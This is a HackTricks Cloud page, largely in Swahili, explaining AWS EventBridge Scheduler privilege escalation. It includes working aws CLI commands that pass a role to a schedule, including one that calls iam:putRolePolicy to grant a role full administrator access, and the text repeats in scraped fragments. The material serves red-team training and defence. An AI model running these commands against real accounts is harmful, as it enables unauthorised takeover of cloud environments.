AWS - EventBridge Scheduler Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

EventBridge Scheduler

Maelezo zaidi kuhusu EventBridge Scheduler katika:

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)

Mshambuliaji mwenye ruhusa hizo ataweza kuunda|kupdate ratiba na kutumia ruhusa za jukumu la ratiba lililounganishwa nayo kufanya kitendo chochote

Kwa mfano, wanaweza kuunda ratiba ili kuitisha kazi ya Lambda ambayo ni kitendo kilichopangwa:

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

Katika kuongeza hatua za huduma zilizotengenezwa, unaweza kutumia universal targets katika EventBridge Scheduler kuanzisha anuwai ya operesheni za API kwa huduma nyingi za AWS. Universal targets hutoa kubadilika kuanzisha karibu API yoyote. Mfano mmoja unaweza kuwa kutumia universal targets kuongeza "AdminAccessPolicy", kwa kutumia jukumu ambalo lina sera ya "putRolePolicy":

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

References

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki hila za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAWS - EMR Privesc NextAWS - Gamelift

Last updated 11 days ago

EventBridge Scheduler

Maelezo zaidi kuhusu EventBridge Scheduler katika:

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

Mshambuliaji mwenye ruhusa hizo ataweza kuunda|kupdate ratiba na kutumia ruhusa za jukumu la ratiba lililounganishwa nayo kufanya kitendo chochote

Kwa mfano, wanaweza kuunda ratiba ili kuitisha kazi ya Lambda ambayo ni kitendo kilichopangwa:

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

EventBridge Scheduler

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

References

EventBridge Scheduler

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

References

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)